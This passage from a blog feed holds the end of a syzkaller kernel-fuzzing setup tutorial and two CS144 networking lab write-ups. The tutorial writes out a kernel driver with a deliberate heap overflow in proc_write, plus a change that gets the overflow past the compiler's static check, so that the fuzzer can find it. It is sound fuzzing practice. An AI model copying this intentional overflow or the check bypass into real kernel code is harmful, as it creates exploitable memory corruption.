class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_dir_entry</span> *test_entry;</span><br><span class="line">    <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">file_operations</span> *proc_fops = &amp;a;</span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:proc init start!\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Create the proc entry</span></span><br><span class="line">    test_entry = <span class="built_in">proc_create</span>(MY_DEV_NAME, S_IRUGO|S_IWUGO, <span class="literal">NULL</span>, proc_fops);</span><br><span class="line">    <span class="keyword">if</span>(!test_entry)</span><br><span class="line">       <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:there is somethings wrong!\n&quot;</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:proc init over!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>The vulnerable part of the driver is shown below. Writing to the <code>/proc/test</code> file causes a kernel heap overflow:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span> <span class="title">proc_write</span> <span class="params">(<span class="keyword">struct</span> file *proc_file, 
<span class="type">const</span> <span class="type">char</span> __user *proc_user, <span class="type">size_t</span> n, <span class="type">loff_t</span> *loff)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">char</span> *c = <span class="built_in">kmalloc</span>(<span class="number">512</span>, GFP_KERNEL);</span><br><span class="line">    <span class="comment">// Overflow: the buffer is only 512 bytes, but 4096 bytes are copied</span></span><br><span class="line">    <span class="built_in">copy_from_user</span>(c, proc_user, <span class="number">4096</span>);</span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:into write!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><p>Now try to build it into the kernel.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Download the source to linux/drivers/char/test.c</span></span><br><span class="line">proxychains wget -v https://github.com/hardenedlinux/Debian-GNU-Linux-Profiles/raw/master/docs/harbian_qa/fuzz_testing/test.c -O linux/drivers/char/test.c</span><br><span class="line"><span class="comment"># Update the Makefile</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;obj-y += test.o&quot;</span> &gt;&gt; linux/drivers/char/Makefile</span><br><span class="line"><span class="comment"># Try to build</span></span><br><span class="line">make</span><br></pre></td></tr></table></figure><p>The build fails with the following errors:</p><p><img src="/2021/11/syzkaller_1/image-20211121142921325.png" 
alt="image-20211121142921325"></p><p>Two things go wrong here:</p><ul><li><p>The <code>struct file_operations</code> used in the original code has to be replaced with <code>struct proc_ops</code> (since Linux 5.6, <code>proc_create</code> takes a <code>struct proc_ops</code>).</p></li><li><p>The Linux kernel build performs static checks at compile time, and an overflow like this one, which can be deduced statically, is rejected by the compiler:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> *c = <span class="built_in">kmalloc</span>(<span class="number">512</span>, GFP_KERNEL);</span><br><span class="line"><span class="built_in">copy_from_user</span>(c, proc_user, <span class="number">4096</span>);</span><br></pre></td></tr></table></figure><p>Bypassing the static check is easy: just make the sizes depend on a runtime variable.</p></li></ul><p>I therefore made a few small changes to the driver file. The modified version is shown below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span 
class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/init.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/module.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/proc_fs.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/uaccess.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/slab.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MY_DEV_NAME <span class="string">&quot;test&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DEBUG_FLAG <span class="string">&quot;PROC_DEV&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span> <span class="title">proc_read</span> <span class="params">(<span class="keyword">struct</span> file *proc_file, <span class="type">char</span> __user *proc_user, <span 
class="type">size_t</span> n, <span class="type">loff_t</span> *loff)</span></span>;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span> <span class="title">proc_write</span> <span class="params">(<span class="keyword">struct</span> file *proc_file, <span class="type">const</span> <span class="type">char</span> __user *proc_user, <span class="type">size_t</span> n, <span class="type">loff_t</span> *loff)</span></span>;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">proc_open</span> <span class="params">(<span class="keyword">struct</span> inode *proc_inode, <span class="keyword">struct</span> file *proc_file)</span></span>;</span><br><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_ops</span> a = &#123;</span><br><span class="line">                                .proc_open = proc_open,</span><br><span class="line">                                .proc_read = proc_read,</span><br><span class="line">                                .proc_write = proc_write,</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> __init <span class="title">mod_init</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_dir_entry</span> *test_entry;</span><br><span class="line">    <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">proc_ops</span> *proc_fops = &amp;a;</span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:proc init 
start!\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    test_entry = <span class="built_in">proc_create</span>(MY_DEV_NAME, S_IRUGO|S_IWUGO, <span class="literal">NULL</span>, proc_fops);</span><br><span class="line">    <span class="keyword">if</span>(!test_entry)</span><br><span class="line">       <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:there is somethings wrong!\n&quot;</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:proc init over!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span> <span class="title">proc_read</span> <span class="params">(<span class="keyword">struct</span> file *proc_file, <span class="type">char</span> __user *proc_user, <span class="type">size_t</span> n, <span class="type">loff_t</span> *loff)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:finish copy_from_use,the string of newbuf is&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span> <span class="title">proc_write</span> <span class="params">(<span class="keyword">struct</span> file *proc_file, <span class="type">const</span> <span class="type">char</span> __user *proc_user, <span class="type">size_t</span> n, <span class="type">loff_t</span> 
*loff)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">char</span> *c = <span class="built_in">kmalloc</span>(n + <span class="number">512</span>, GFP_KERNEL);</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> size = <span class="built_in">copy_from_user</span>(c, proc_user, n + <span class="number">4096</span>);</span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:into write %ld!\n&quot;</span>, size);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">proc_open</span> <span class="params">(<span class="keyword">struct</span> inode *proc_inode, <span class="keyword">struct</span> file *proc_file)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:into open!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">module_init</span>(mod_init);</span><br></pre></td></tr></table></figure><p>Then run <code>make</code> and boot the rebuilt kernel. The target proc entry can now be found at <code>/proc/test</code>:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@syzkaller:~# <span class="built_in">ls</span> -al /proc/test </span><br><span class="line">-rw-rw-rw-. 
1 root root 0 Nov 21 06:43 /proc/test</span><br></pre></td></tr></table></figure><p>Good, the vulnerable driver has been built into the kernel. Next, power the VM off and start configuring syzkaller.</p><h3 id="2-配置-syzkaller-规则">2. Configuring the syzkaller rules</h3><p>In <code>syzkaller/sys/linux/</code>, create a description file <code>test.txt</code> for this vulnerable driver (the name does not matter) with the following content:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">include &lt;linux/fs.h&gt;</span><br><span class="line"> </span><br><span class="line">open$<span class="built_in">proc</span>(file ptr[in, string[<span class="string">&quot;/proc/test&quot;</span>]], flags flags[proc_open_flags], mode flags[proc_open_mode]) fd</span><br><span class="line">read$<span class="built_in">proc</span>(fd fd, buf buffer[out], count len[buf])</span><br><span class="line">write$<span class="built_in">proc</span>(fd fd, buf buffer[in], count len[buf])</span><br><span class="line">close$<span class="built_in">proc</span>(fd fd)</span><br><span class="line"> </span><br><span class="line">proc_open_flags = O_RDONLY, O_WRONLY, O_RDWR, O_APPEND, FASYNC, O_CLOEXEC, O_CREAT, O_DIRECT, O_DIRECTORY, O_EXCL, O_LARGEFILE, O_NOATIME, O_NOCTTY, O_NOFOLLOW, O_NONBLOCK, O_PATH, O_SYNC, O_TRUNC, __O_TMPFILE</span><br><span class="line">proc_open_mode = S_IRUSR, S_IWUSR, S_IXUSR, S_IRGRP, S_IWGRP, S_IXGRP, S_IROTH, S_IWOTH, S_IXOTH</span><br></pre></td></tr></table></figure><p>In the <strong>root directory</strong> of the syzkaller project, run the following command to create the corresponding .const file:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bin/syz-extract -os linux -sourcedir <span class="string">&quot;/usr/class/linux&quot;</span> -<span 
class="built_in">arch</span> amd64 test.txt</span><br></pre></td></tr></table></figure><p>Run the following commands to rebuild syzkaller:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">bin/syz-sysgen</span><br><span class="line">make all</span><br></pre></td></tr></table></figure><p>syzkaller is now rebuilt.</p><blockquote><p>You may be wondering why these rules have to be configured, what they are based on, and what their syntax looks like.</p><p>You may also wonder why a .const file has to be created, and why syz-sysgen has to be run again afterwards.</p><p>These are exactly the questions I had while writing this line.</p><p>There is no rush, though, because all of them will be covered later.</p></blockquote><h3 id="3-syzkaller-开跑">3. Running syzkaller</h3><p>Before the actual run, we need to adjust the syzkaller run configuration. Edit my.cfg and add the following:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;enable_syscalls&quot;</span>: [</span><br><span class="line">    <span class="string">&quot;open$proc&quot;</span>,</span><br><span class="line">    <span class="string">&quot;read$proc&quot;</span>,</span><br><span class="line">    <span class="string">&quot;write$proc&quot;</span>,</span><br><span class="line">    <span class="string">&quot;close$proc&quot;</span></span><br><span class="line">],</span><br></pre></td></tr></table></figure><p>Then start syzkaller:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bin/syz-manager -config my.cfg -vv 10</span><br></pre></td></tr></table></figure><p>After a short while (very quickly), we get:</p><p><img src="/2021/11/syzkaller_1/image-20211122092540576.png" alt="image-20211122092540576"></p><p>At this point syzkaller is reproducing the crash, and the crash sample is not very readable:</p><p><img src="/2021/11/syzkaller_1/image-20211122093042147.png" 
alt="image-20211122093042147"></p><p>That is not a big problem: after waiting a <strong>very long</strong> while, <s>we can view the result in the web UI</s> maybe I was just unlucky, but after half an hour the reproduce step still had not finished (reproduction takes forever...):</p><p><img src="/2021/11/syzkaller_1/image-20211122095516144.png" alt="image-20211122095516144"></p><p>Having tried it for a while, one thing is worth noting: when syzkaller detects a crash, it <strong>seems</strong> to stop all VMs and use them to reproduce that crash. My guess is that this costs some fuzzing throughput? (I am not sure.)</p><h2 id="四、参考链接">IV. References</h2><ul><li><a href="https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md">syzkaller official documentation</a></li><li><a href="https://github.com/hardenedlinux/Debian-GNU-Linux-Profiles/blob/master/docs/harbian_qa/fuzz_testing/syzkaller_crash_demo.md">Syzkaller crash DEMO - github</a></li><li><a href="https://bbs.pediy.com/thread-265405.htm">[Original] Using syzkaller for Linux kernel vulnerability discovery, from 0 to 1 - Kanxue</a></li></ul>]]></content>
    
    
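    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;Syzkaller is an unsupervised, coverage-guided kernel fuzzer, and something of a milestone among current fuzzers.&lt;/p&gt;
&lt;p&gt;Project page - &lt;a href=&quot;https://github.com/google/syzkaller&quot;&gt;syzkaller&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I am interested in how syzkaller works internally, and my research group uses it regularly, so understanding syzkaller is a necessary step.&lt;/p&gt;
&lt;p&gt;Before studying how kernel fuzzing works, we first need to learn how to set up its environment.&lt;/p&gt;</summary>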
    
    
    
    
    <category term="fuzz" scheme="https://kiprey.github.io/tags/fuzz/"/>
    
    <category term="kernel" scheme="https://kiprey.github.io/tags/kernel/"/>
    
    <category term="syzkaller" scheme="https://kiprey.github.io/tags/syzkaller/"/>
    
  </entry>
  
  <entry>
    <title>CS144 Computer Networking Lab6</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab6/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab6/</id>
    <published>2021-11-17T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.920Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>These are my notes from working through CS144 Computer Networking Lab6 - implementing an <strong>IP router</strong></p><p>CS144 Lab6 handout - <a href="https://cs144.github.io/assignments/lab6.pdf">Lab Checkpoint 6: building an IP router</a></p><p>My CS144 lab repository - <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><p>In this lab we build a <strong>simple</strong> router whose job, for a given datagram, is to <strong>pick the outgoing interface</strong> and the <strong>IP address of the next hop</strong>. To keep things simple, the lab <strong>does not involve any complex routing protocol</strong>, and the code needs at most about 30 lines.</p><p><img src="/2021/11/cs144-lab6/image-20211118175306520.png" alt="image-20211118175306520"></p><h2 id="二、环境配置">II. Environment setup</h2><p>Our lab code currently lives on the <code>master</code> branch, and the starter code has to be merged in before starting the lab, so run:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab6-startercode</span><br></pre></td></tr></table></figure><p>Then rebuild with make.</p><h2 id="三、Router-的实现">III. Implementing the Router</h2><p>The Router is fairly simple: implement IP longest-prefix matching and forward the datagram.</p><p>The private members of the class are as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Router</span> &#123;</span><br><span class="line">    <span class="comment">//! 
The router&#x27;s collection of network interfaces</span></span><br><span class="line">    std::vector&lt;AsyncNetworkInterface&gt; _interfaces&#123;&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Send a single datagram from the appropriate outbound interface to the next hop,</span></span><br><span class="line">    <span class="comment">//! as specified by the route with the longest prefix_length that matches the</span></span><br><span class="line">    <span class="comment">//! datagram&#x27;s destination address.</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">route_one_datagram</span><span class="params">(InternetDatagram &amp;dgram)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">RouterTableEntry</span> &#123;</span><br><span class="line">        <span class="type">const</span> <span class="type">uint32_t</span> route_prefix;</span><br><span class="line">        <span class="type">const</span> <span class="type">uint8_t</span> prefix_length;</span><br><span class="line">        <span class="type">const</span> std::optional&lt;Address&gt; next_hop;</span><br><span class="line">        <span class="type">const</span> <span class="type">size_t</span> interface_idx;</span><br><span class="line">    &#125;;</span><br><span class="line">    std::vector&lt;RouterTableEntry&gt; _router_table&#123;&#125;;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">public</span>:</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>类函数方法实现如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//! \param[in] route_prefix The &quot;up-to-32-bit&quot; IPv4 address prefix to match the datagram&#x27;s destination address against</span></span><br><span class="line"><span class="comment">//! \param[in] prefix_length For this route to be applicable, how many high-order (most-significant) bits of the route_prefix will need to match the corresponding bits of the datagram&#x27;s destination address?</span></span><br><span class="line"><span class="comment">//! \param[in] next_hop The IP address of the next hop. Will be empty if the network is directly attached to the router (in which case, the next hop address should be the datagram&#x27;s final destination).</span></span><br><span class="line"><span class="comment">//! 
\param[in] interface_num The index of the interface to send the datagram out on.</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">Router::add_route</span><span class="params">(<span class="type">const</span> <span class="type">uint32_t</span> route_prefix,</span></span></span><br><span class="line"><span class="params"><span class="function">                       <span class="type">const</span> <span class="type">uint8_t</span> prefix_length,</span></span></span><br><span class="line"><span class="params"><span class="function">                       <span class="type">const</span> optional&lt;Address&gt; next_hop,</span></span></span><br><span class="line"><span class="params"><span class="function">                       <span class="type">const</span> <span class="type">size_t</span> interface_num)</span> </span>&#123;</span><br><span class="line">    cerr &lt;&lt; <span class="string">&quot;DEBUG: adding route &quot;</span> &lt;&lt; Address::<span class="built_in">from_ipv4_numeric</span>(route_prefix).<span class="built_in">ip</span>() &lt;&lt; <span class="string">&quot;/&quot;</span> &lt;&lt; <span class="built_in">int</span>(prefix_length)</span><br><span class="line">         &lt;&lt; <span class="string">&quot; =&gt; &quot;</span> &lt;&lt; (next_hop.<span class="built_in">has_value</span>() ? next_hop-&gt;<span class="built_in">ip</span>() : <span class="string">&quot;(direct)&quot;</span>) &lt;&lt; <span class="string">&quot; on interface &quot;</span> &lt;&lt; interface_num &lt;&lt; <span class="string">&quot;\n&quot;</span>;</span><br><span class="line"></span><br><span class="line">    _router_table.<span class="built_in">push_back</span>(&#123;route_prefix, prefix_length, next_hop, interface_num&#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! 
\param[in] dgram The datagram to be routed</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">Router::route_one_datagram</span><span class="params">(InternetDatagram &amp;dgram)</span> </span>&#123;</span><br><span class="line">    <span class="type">const</span> <span class="type">uint32_t</span> dst_ip_addr = dgram.<span class="built_in">header</span>().dst;</span><br><span class="line">    <span class="keyword">auto</span> max_matched_entry = _router_table.<span class="built_in">end</span>();</span><br><span class="line">    <span class="comment">// Walk the routing table</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> router_entry_iter = _router_table.<span class="built_in">begin</span>(); router_entry_iter != _router_table.<span class="built_in">end</span>();</span><br><span class="line">         router_entry_iter++) &#123;</span><br><span class="line">        <span class="comment">// An entry matches if its prefix length is 0, or if the top prefix_length bits are equal</span></span><br><span class="line">        <span class="keyword">if</span> (router_entry_iter-&gt;prefix_length == <span class="number">0</span> ||</span><br><span class="line">            (router_entry_iter-&gt;route_prefix ^ dst_ip_addr) &gt;&gt; (<span class="number">32</span> - router_entry_iter-&gt;prefix_length) == <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="comment">// On a match, keep the entry with the longest prefix seen so far</span></span><br><span class="line">            <span class="keyword">if</span> (max_matched_entry == _router_table.<span class="built_in">end</span>() ||</span><br><span class="line">                max_matched_entry-&gt;prefix_length &lt; router_entry_iter-&gt;prefix_length)</span><br><span class="line">                max_matched_entry = router_entry_iter;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Decrement the datagram TTL by 1</span></span><br><span class="line">    <span class="comment">// If a best match exists and the datagram is still alive after the decrement, forward it</span></span><br><span class="line">    <span class="keyword">if</span> (max_matched_entry != _router_table.<span class="built_in">end</span>() &amp;&amp; dgram.<span class="built_in">header</span>().ttl-- &gt; <span class="number">1</span>) &#123;</span><br><span class="line">        <span class="type">const</span> optional&lt;Address&gt; next_hop = max_matched_entry-&gt;next_hop;</span><br><span class="line">        AsyncNetworkInterface &amp;interface = _interfaces[max_matched_entry-&gt;interface_idx];</span><br><span class="line">        <span class="keyword">if</span> (next_hop.<span class="built_in">has_value</span>())</span><br><span class="line">            interface.<span class="built_in">send_datagram</span>(dgram, next_hop.<span class="built_in">value</span>());</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            interface.<span class="built_in">send_datagram</span>(dgram, Address::<span class="built_in">from_ipv4_numeric</span>(dst_ip_addr));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// In every other case the datagram is dropped</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="四、测试">IV. Testing</h2><p>This is the CS144 test network topology:</p><p><img src="/2021/11/cs144-lab6/image-20211118175644978.png" alt="image-20211118175644978"></p><p>And these are my test results:</p><p><img src="/2021/11/cs144-lab6/image-20211118210129124.png" alt="image-20211118210129124"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;These are my notes from working through CS144 Computer Networking Lab6 - implementing an &lt;strong&gt;IP router&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;CS144 Lab6 handout - &lt;a href=&quot;https://cs144.github.io/assignments/lab6.pdf&quot;&gt;Lab Checkpoint 6: building an IP router&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My CS144 lab repository - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144 Computer Networking Lab7</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab7/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab7/</id>
    <published>2021-11-17T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.922Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>These are my notes (?) from working through CS144 Computer Networking Lab7</p><p>This is also the final CS144 lab (almost done at last)</p><p>CS144 Lab7 handout - <a href="https://cs144.github.io/assignments/lab7.pdf">Final checkpoint: putting it all together</a></p><p>My CS144 lab repository - <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><p>This lab requires no coding at all.</p><p>Instead, it lets us glue together everything implemented in the previous 7 labs and use it to communicate over the real network.</p><p>This is what the final result looks like:</p><p><img src="/2021/11/cs144-lab7/image-20211118211047223.png" alt="image-20211118211047223"></p><h2 id="二、环境配置">II. Environment setup</h2><p>Our lab code currently lives on the <code>master</code> branch, and the starter code has to be merged in before starting the lab, so run:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab7-startercode</span><br></pre></td></tr></table></figure><p>Then rebuild with make.</p><h2 id="三、运行">III. Running</h2><p>Run the following two commands, one in each of two terminals:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./apps/lab7 server cs144.keithw.org 3000</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./apps/lab7 client cs144.keithw.org 3001</span><br></pre></td></tr></table></figure><p>The two endpoints then connect to each other successfully:</p><p><img src="/2021/11/cs144-lab7/image-20211118212210235.png" alt="image-20211118212210235"></p><p><img src="/2021/11/cs144-lab7/image-20211118212219097.png" alt="image-20211118212219097"></p><p>The final results of the full CS144 test suite:</p><p><img src="/2021/11/cs144-lab7/image-20211118212610868.png" alt="image-20211118212610868"></p><p>CS144 is complete! Time to celebrate!</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;These are my notes (?) from working through CS144 Computer Networking Lab7&lt;/p&gt;
&lt;p&gt;This is also the final CS144 lab (almost done at last)&lt;/p&gt;
&lt;p&gt;CS144 Lab7 handout - &lt;a href=&quot;https://cs144.github.io/assignments/lab7.pdf&quot;&gt;Final checkpoint: putting it all together&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My CS144 lab repository - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144 Computer Networking Lab5</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab5/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab5/</id>
    <published>2021-11-15T16:00:00.000Z</published>
